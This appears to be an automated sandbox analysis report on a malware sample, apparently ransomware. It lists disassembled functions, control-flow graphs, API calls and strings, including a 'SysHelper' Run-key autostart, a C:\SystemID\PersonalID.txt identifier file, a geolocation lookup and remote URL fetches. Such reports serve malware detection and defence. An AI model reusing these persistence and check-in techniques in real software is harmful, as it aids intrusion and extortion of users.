                                                                                                                                                                                                                                          • Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                                                                                                          • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                                                                                                          • Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                                                                                                        • String ID: C:\
                                                                                                                                                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                                                                                                                                                        • Opcode ID: 02cbcc9ea24c62c3d3e76ae209afd0461053dbc8594d83a6df7828dd56d73afa
                                                                                                                                                                                                                                        • Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02cbcc9ea24c62c3d3e76ae209afd0461053dbc8594d83a6df7828dd56d73afa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1829 41bae0-41bb0d 1830 41bba0-41bba7 1829->1830 1831 41bb13 1829->1831 1832 41bf3d-41bf47 1830->1832 1833 41bbad-41bbae 1830->1833 1834 41bb15-41bb1a 1831->1834 1835 41bb54-41bb5e 1831->1835 1836 41bf49 1832->1836 1837 41bf5c-41bf63 1832->1837 1840 41bbb0-41bbd4 DefWindowProcW 1833->1840 1841 41bbd7-41bc45 call 420c62 GetComputerNameW call 413100 call 41ce80 1833->1841 1842 41bb47-41bb4f PostQuitMessage 1834->1842 1843 41bb1c-41bb1f 1834->1843 1838 41bf81-41bf97 1835->1838 1839 41bb64-41bb68 1835->1839 1844 41bf50-41bf54 1836->1844 1845 41bf65-41bf71 IsWindow 1837->1845 1846 41bf9a-41bfc2 DefWindowProcW 1837->1846 1847 41bb75-41bb9d DefWindowProcW 1839->1847 1848 41bb6a-41bb6e 1839->1848 1863 41bc47-41bc4c 1841->1863 1864 41bc7b-41bc80 1841->1864 1842->1838 1843->1838 1850 41bb25-41bb28 1843->1850 1844->1846 1851 41bf56-41bf5a 1844->1851 1845->1838 1852 41bf73-41bf7b DestroyWindow 1845->1852 1848->1839 1853 41bb70 1848->1853 1850->1840 1855 41bb2e-41bb31 1850->1855 1851->1837 1851->1844 1852->1838 1853->1838 1855->1838 1857 41bb37-41bb42 call 411cd0 1855->1857 1857->1845 1865 41bc5a-41bc76 call 4145a0 1863->1865 1866 41bc4e-41bc57 call 422587 1863->1866 1867 41bc82-41bc8b call 422587 1864->1867 1868 41bc8e-41bcb1 1864->1868 1865->1864 1866->1865 1867->1868 1872 41bcb3-41bcbc call 422587 1868->1872 1873 41bcbf-41bcf1 call 420bed 1868->1873 1872->1873 1880 41bcf7-41bcfa 1873->1880 1881 41befb-41bf0f IsWindow 1873->1881 1882 41bd00-41bd04 1880->1882 1883 41bf11-41bf18 1881->1883 1884 41bf28-41bf2d 1881->1884 1885 41bee5-41bef1 1882->1885 1886 41bd0a-41bd0e 1882->1886 1883->1884 1887 41bf1a-41bf22 DestroyWindow 1883->1887 1884->1838 1888 41bf2f-41bf3b call 422587 1884->1888 1885->1882 1890 41bef7-41bef9 1885->1890 1886->1885 1889 41bd14-41bd7b call 414690 * 2 call 40eff0 1886->1889 1887->1884 1888->1838 1899 41bee1 1889->1899 1900 41bd81-41be44 call 41c330 call 419d10 call 41c240 call 41b680 call 41b8b0 call 414690 call 41ce80 call 4131d0 1889->1900 1890->1881 1890->1884 1899->1885 1917 41be55-41be81 1900->1917 1918 41be46-41be52 call 422587 1900->1918 1919 41be83-41be8c call 422587 1917->1919 1920 41be8f-41bedf CreateThread 1917->1920 1918->1917 1919->1920 1920->1885
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041BCD7
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                                                        • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                                                                                        • Opcode ID: 9807db6dd4ffab962af321d097ca44c4361407685db7c0cfd2bcc48c6b1cb731
                                                                                                                                                                                                                                        • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9807db6dd4ffab962af321d097ca44c4361407685db7c0cfd2bcc48c6b1cb731
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1925 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 1932 40cfb2-40cfb4 1925->1932 1933 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 1925->1933 1934 40d213-40d217 1932->1934 1938 40d000-40d01d 1933->1938 1936 40d224-40d236 1934->1936 1937 40d219-40d221 call 422587 1934->1937 1937->1936 1940 40d023-40d02c 1938->1940 1941 40d01f-40d021 1938->1941 1944 40d030-40d035 1940->1944 1943 40d039-40d069 call 4156d0 call 414300 1941->1943 1950 40d1cb 1943->1950 1951 40d06f-40d08b call 413010 1943->1951 1944->1944 1945 40d037 1944->1945 1945->1943 1953 40d1cd-40d1d1 1950->1953 1959 40d0b9-40d0bd 1951->1959 1960 40d08d-40d091 1951->1960 1955 40d1d3-40d1db call 422587 1953->1955 1956 40d1de-40d1f4 1953->1956 1955->1956 1957 40d201-40d20f 1956->1957 1958 40d1f6-40d1fe call 422587 1956->1958 1957->1934 1958->1957 1962 40d0cd-40d0e1 call 414300 1959->1962 1963 40d0bf-40d0ca call 422587 1959->1963 1965 40d093-40d09b call 422587 1960->1965 1966 40d09e-40d0b4 call 413d40 1960->1966 1962->1950 1976 40d0e7-40d149 call 413010 1962->1976 1963->1962 1965->1966 1966->1959 1979 40d150-40d15a 1976->1979 1980 40d160-40d162 1979->1980 1981 40d15c-40d15e 1979->1981 1983 40d165-40d16a 1980->1983 1982 40d16e-40d18b call 40b650 1981->1982 1987 40d19a-40d19e 1982->1987 1988 40d18d-40d18f 1982->1988 1983->1983 1984 40d16c 1983->1984 1984->1982 1987->1979 1990 40d1a0 1987->1990 1988->1987 1989 40d191-40d198 1988->1989 1989->1987 1991 40d1c7-40d1c9 1989->1991 1992 40d1a2-40d1a6 1990->1992 1991->1992 1993 40d1b3-40d1c5 1992->1993 1994 40d1a8-40d1b0 call 422587 1992->1994 1993->1953 1994->1993
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • "country_code":", xrefs: 0040CFE1
                                                                                                                                                                                                                                        • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                                                                                                                        • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                                                                                        • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                                                                                        • API String ID: 1485416377-2962370585
                                                                                                                                                                                                                                        • Opcode ID: 61ae16a5be6c75bfa23cdeafeaebca6e4cfccb4efbfb813c7956fe22a537a39a
                                                                                                                                                                                                                                        • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61ae16a5be6c75bfa23cdeafeaebca6e4cfccb4efbfb813c7956fe22a537a39a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 2147 40c740-40c792 call 420fdd 2150 40c911-40c915 2147->2150 2151 40c798-40c7a3 call 420546 2147->2151 2152 40c944-40c968 CreateDirectoryW call 420fdd 2150->2152 2153 40c917 2150->2153 2159 40c906-40c90e call 423a38 2151->2159 2160 40c7a9 2151->2160 2164 40c96a-40c96c 2152->2164 2165 40c9af-40c9b3 2152->2165 2155 40c920-40c93b call 414c60 2153->2155 2155->2164 2169 40c93d-40c942 2155->2169 2159->2150 2163 40c7b0-40c7bc call 421101 2160->2163 2175 40c7c1-40c7c6 2163->2175 2171 40c972-40c976 2164->2171 2172 40ca43-40ca47 2164->2172 2167 40c9b5 2165->2167 2168 40c9d8-40ca03 call 4228fd * 2 call 423a38 2165->2168 2174 40c9b8-40c9bc 2167->2174 2168->2172 2213 40ca05-40ca09 2168->2213 2169->2152 2169->2155 2176 40ca3a-40ca40 call 422587 2171->2176 2177 40c97c 2171->2177 2179 40ca54-40ca64 2172->2179 2180 40ca49-40ca51 call 422587 2172->2180 2181 40c9c2 2174->2181 2182 40c9be-40c9c0 2174->2182 2183 40c8f3-40c900 call 420546 2175->2183 2184 40c7cc-40c7e7 2175->2184 2176->2172 2186 40c980-40c984 2177->2186 2180->2179 2189 40c9c4-40c9d3 call 4228fd 2181->2189 2182->2189 2183->2159 2183->2163 2190 40c7e9-40c7eb 2184->2190 2191 40c7ed-40c7f3 2184->2191 2194 40c990-40c9a8 2186->2194 2195 40c986-40c98d call 422587 2186->2195 2189->2174 2211 40c9d5 2189->2211 2200 40c805-40c81e call 415c10 2190->2200 2201 40c7f6-40c7ff 2191->2201 2194->2186 2198 40c9aa 2194->2198 2195->2194 2198->2176 2214 40c820-40c822 2200->2214 2215 40c861-40c863 2200->2215 2201->2201 2206 40c801-40c803 2201->2206 2206->2200 2211->2168 2213->2176 2217 40ca0b 2213->2217 2214->2215 2216 40c824-40c83c 2214->2216 2218 40c874-40c876 2215->2218 2219 40c865-40c871 call 414f70 2215->2219 2220 40c84d-40c855 2216->2220 2221 40c83e-40c84a call 414f70 2216->2221 2222 40ca10-40ca14 2217->2222 2224 40c8d5-40c8e3 2218->2224 2225 40c878-40c88f 2218->2225 2219->2218 2220->2224 2229 40c857-40c85f call 413160 2220->2229 2221->2220 2227 40ca20-40ca38 2222->2227 2228 40ca16-40ca1d call 422587 2222->2228 2230 40c8f0 2224->2230 2231 40c8e5-40c8ed call 422587 2224->2231 2233 40c891-40c895 2225->2233 2234 40c8a9-40c8ae 2225->2234 2227->2176 2227->2222 2228->2227 2229->2224 2230->2183 2231->2230 2236 40c8b5-40c8d1 2233->2236 2240 40c897-40c8a7 call 4205a0 2233->2240 2234->2236 2236->2224 2240->2236
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                                                                                                                        • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0040C89F
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                                                                                        • Opcode ID: a48f2902b6917900b3f30e831e771307a42463aeb79284a06921e56d4381bb6a
                                                                                                                                                                                                                                        • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a48f2902b6917900b3f30e831e771307a42463aeb79284a06921e56d4381bb6a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 2246 40c6a0-40c6ca RegOpenKeyExW 2247 40c734-40c739 2246->2247 2248 40c6cc-40c6fb RegQueryValueExW 2246->2248 2249 40c70c-40c72e RegSetValueExW RegCloseKey 2248->2249 2250 40c6fd-40c70b RegCloseKey 2248->2250 2249->2247
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                                                                                        • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                                                        • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 2251 41e6e8-41e6ef 2252 41e6f0-41e722 call 42b420 call 40c500 2251->2252 2257 41e724-41e729 2252->2257 2258 41e72e-41e772 InternetOpenW 2252->2258 2261 41ea1f-41ea40 call 423cf0 2257->2261 2259 41e774-41e776 2258->2259 2260 41e778-41e77d 2258->2260 2262 41e78f-41e7b8 call 415ae0 call 421c02 2259->2262 2263 41e780-41e789 2260->2263 2268 41ea42-41ea46 2261->2268 2269 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 2261->2269 2284 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 2262->2284 2285 41e7be-41e7f7 call 414690 call 40dd40 2262->2285 2263->2263 2265 41e78b-41e78d 2263->2265 2265->2262 2271 41ee2a-41ee3a call 411b10 2268->2271 2272 41ea4c-41ea61 SHGetFolderPathA 2268->2272 2273 41eaef-41eb12 2269->2273 2274 41eace 2269->2274 2292 41ee4d-41ee82 call 40ef50 2271->2292 2293 41ee3c-41ee3f 2271->2293 2272->2252 2276 41ea67-41ea88 PathAppendA DeleteFileA 2272->2276 2280 41eb14-41eb16 2273->2280 2281 41eb18-41eb1f 2273->2281 2277 41ead0-41ead8 2274->2277 2276->2252 2282 41eaeb 2277->2282 2283 41eada-41eae7 lstrlenA 2277->2283 2287 41eb2b-41eb4f call 4156d0 call 412900 2280->2287 2288 41eb22-41eb27 2281->2288 2282->2273 2283->2277 2290 41eae9 2283->2290 2342 41e8f3-41e917 lstrcpyW 2284->2342 2343 41e8e7-41e8f0 call 422587 2284->2343 2314 41e7f9-41e7fe 2285->2314 2315 41e86f-41e874 2285->2315 2312 41eb51 2287->2312 2313 41eb53-41eb66 lstrcpyW 2287->2313 2288->2288 2295 41eb29 2288->2295 2290->2273 2305 41ee86-41ee8c 2292->2305 2300 41e6e0-41e6e6 2293->2300 2295->2287 2300->2252 2309 41ee92-41ee94 2305->2309 2310 41ee8e-41ee90 2305->2310 2320 41ee97-41ee9c 2309->2320 2318 41eea0-41eeaf call 413ea0 2310->2318 2312->2313 2321 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 2313->2321 2322 41eb68-41eb71 call 422587 2313->2322 2316 41e800-41e809 call 422587 2314->2316 2317 41e80c-41e827 2314->2317 2315->2284 2323 41e876-41e87f call 422587 2315->2323 2316->2317 2325 41e842-41e848 2317->2325 2326 41e829-41e82d 2317->2326 2318->2305 2344 41eeb1-41eee3 call 40ef50 2318->2344 2320->2320 2328 41ee9e 2320->2328 2365 41ebe6-41ebea 2321->2365 2366 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 2321->2366 2322->2321 2323->2284 2335 41e84e-41e86c 2325->2335 2334 41e82f-41e840 call 4205a0 2326->2334 2326->2335 2328->2318 2334->2335 2335->2315 2348 41e943-41e97a InternetOpenUrlW InternetReadFile 2342->2348 2349 41e919-41e920 2342->2349 2343->2342 2364 41eee7-41eeed 2344->2364 2352 41e9ec-41ea08 InternetCloseHandle * 2 2348->2352 2353 41e97c-41e994 SHGetFolderPathA 2348->2353 2349->2348 2355 41e922-41e92e 2349->2355 2360 41ea16-41ea19 2352->2360 2361 41ea0a-41ea13 call 422587 2352->2361 2353->2352 2359 41e996-41e9c2 PathAppendA call 4220b6 2353->2359 2362 41e930-41e935 2355->2362 2363 41e937 2355->2363 2359->2352 2382 41e9c4-41e9e9 lstrlenA call 422b02 call 423a38 2359->2382 2360->2261 2361->2360 2369 41e93c-41e93d lstrcatW 2362->2369 2363->2369 2370 41eef3-41eef5 2364->2370 2371 41eeef-41eef1 2364->2371 2365->2271 2373 41ebf0-41ec11 SHGetFolderPathA 2365->2373 2375 41ec99 2366->2375 2376 41ecbf-41ecdd 2366->2376 2369->2348 2372 41eef8-41eefd 2370->2372 2378 41ef01-41ef10 call 413ea0 2371->2378 2372->2372 2379 41eeff 2372->2379 2373->2252 2380 41ec17-41ec38 PathAppendA DeleteFileA 2373->2380 2383 41eca0-41eca8 2375->2383 2384 41ece3-41eced 2376->2384 2385 41ecdf-41ece1 2376->2385 2378->2364 2393 41ef12-41ef4c call 413ff0 call 412900 2378->2393 2379->2378 2380->2300 2382->2352 2388 41ecbb 2383->2388 2389 41ecaa-41ecb7 lstrlenA 2383->2389 2391 41ecf0-41ecf5 2384->2391 2390 41ecf9-41ed1b call 4156d0 call 412900 2385->2390 2388->2376 2389->2383 2395 41ecb9 2389->2395 2405 41ed1d 2390->2405 2406 41ed1f-41ed35 lstrcpyW 2390->2406 2391->2391 2396 41ecf7 2391->2396 2410 41ef50-41ef68 lstrcpyW 2393->2410 2411 41ef4e 2393->2411 2395->2376 2396->2390 2405->2406 2408 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 2406->2408 2409 41ed37-41ed40 call 422587 2406->2409 2426 41edad-41edb6 lstrlenW 2408->2426 2427 41edbc-41edc1 2408->2427 2409->2408 2414 41ef76-41efb3 call 413ff0 call 412900 2410->2414 2415 41ef6a-41ef73 call 422587 2410->2415 2411->2410 2430 41efb5 2414->2430 2431 41efb7-41efc6 lstrcpyW 2414->2431 2415->2414 2426->2427 2432 41ee44-41ee48 2426->2432 2428 41ee10-41ee12 2427->2428 2429 41edc3-41ede4 SHGetFolderPathA 2427->2429 2434 41ee14-41ee1a call 420bed 2428->2434 2435 41ee1d-41ee1f 2428->2435 2429->2252 2433 41edea-41ee0b PathAppendA DeleteFileA 2429->2433 2430->2431 2436 41efd4-41efe0 2431->2436 2437 41efc8-41efd1 call 422587 2431->2437 2438 41f01a-41f030 2432->2438 2433->2300 2434->2435 2435->2271 2440 41ee21-41ee27 call 420bed 2435->2440 2442 41efe2-41efeb call 422587 2436->2442 2443 41efee-41f008 2436->2443 2437->2436 2440->2271 2442->2443 2448 41f016 2443->2448 2449 41f00a-41f013 call 422587 2443->2449 2448->2438 2449->2448
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041E707
                                                                                                                                                                                                                                          • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                                                                                                        • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                                                                                                        • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
